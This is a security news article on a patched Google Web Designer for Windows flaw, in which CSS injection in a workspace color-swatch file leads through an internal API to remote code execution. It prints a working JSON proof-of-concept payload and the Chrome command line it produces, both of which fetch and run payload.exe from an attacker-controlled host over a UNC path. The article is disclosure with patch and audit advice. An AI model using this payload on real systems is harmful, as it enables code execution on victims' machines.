By abusing CSS injection in the document configuration file, attackers can execute arbitrary commands on a victim’s machine via Chrome’s internal API.
Google Web Designer stores custom color palettes in gwd_workspace.json, under the color.customColorPalettes array.
Solid colors are parsed safely into RGBA components, but gradient definitions bypass strict sanitization. An attacker can insert arbitrary CSS rules into the css field:
```json
"color.customColorPalettes": [
  {
    "name": "evilSwatch",
    "color_data": [
      {
        "css": "-webkit-linear-gradient;background:url('//ninja-shell/api/browser?method=open&usedefaultapp=false&browser=chrome&url=//%22%20--browser-subprocess-path%3D%5C%5Cattacker.com%5Cpayload.exe%20--headless%20%22')"
      }
    ]
  }
]
```
When the Swatches UI is rendered, this injection triggers a request to the internal ninja-shell API, which bridges the JavaScript application shell to native OS operations.
Google Web Designer leverages a REST API at //ninja-shell/api/browser to open URLs in Chrome:
```text
GET //ninja-shell/api/browser?method=open
    &usedefaultapp=false
    &browser=chrome
    &url=https%3A%2F%2Faccounts.google.com%2F...
```
Because the url parameter is not properly escaped, an attacker can break out of the quoted argument and append additional flags.
For example, injecting %22 --browser-subprocess-path=%5C%5Cbalintmagyar.com%5Cpayload.exe --headless %22 causes Chrome to launch with:
```text
chrome.exe "//" --browser-subprocess-path=\\balintmagyar.com\payload.exe --headless ""
```
By hosting payload.exe on a WebDAV server and referencing it via a UNC path, Windows will fetch and execute the payload transparently, achieving full RCE when a user clicks the custom swatch.
This vulnerability (CWE-78) affects Google Web Designer for Windows builds before 16.4.0.0711 (released July 29, 2025).
macOS and Linux versions are not exploitable due to differing subprocess handling.
A successful attack requires minimal user interaction: opening a malicious ad document and selecting the Swatches option in the color picker.
Google’s Vulnerability Reward Program awarded $3,500 for this submission. Users should update to version 16.4.0.0711 or later, which enforces strict sanitization of gradient definitions and properly escapes command-line arguments for the internal API.
Security teams are advised to audit any custom gwd_workspace.json files for unexpected url() or gradient rules and to restrict network file share access where possible.
With this discovery, Magyar highlights the latent risks of intermixing native and web components in modern applications.
While CSS injection rarely escalates to code execution, this chain of vulnerabilities underscores the importance of rigorous input validation and sandboxing of internal APIs.
Continuous review of third-party tools remains essential to maintaining a secure development and publishing pipeline.
The post Google Web Designer Vulnerability Could Let Hackers Take Control of PCs appeared first on Cyber Security News.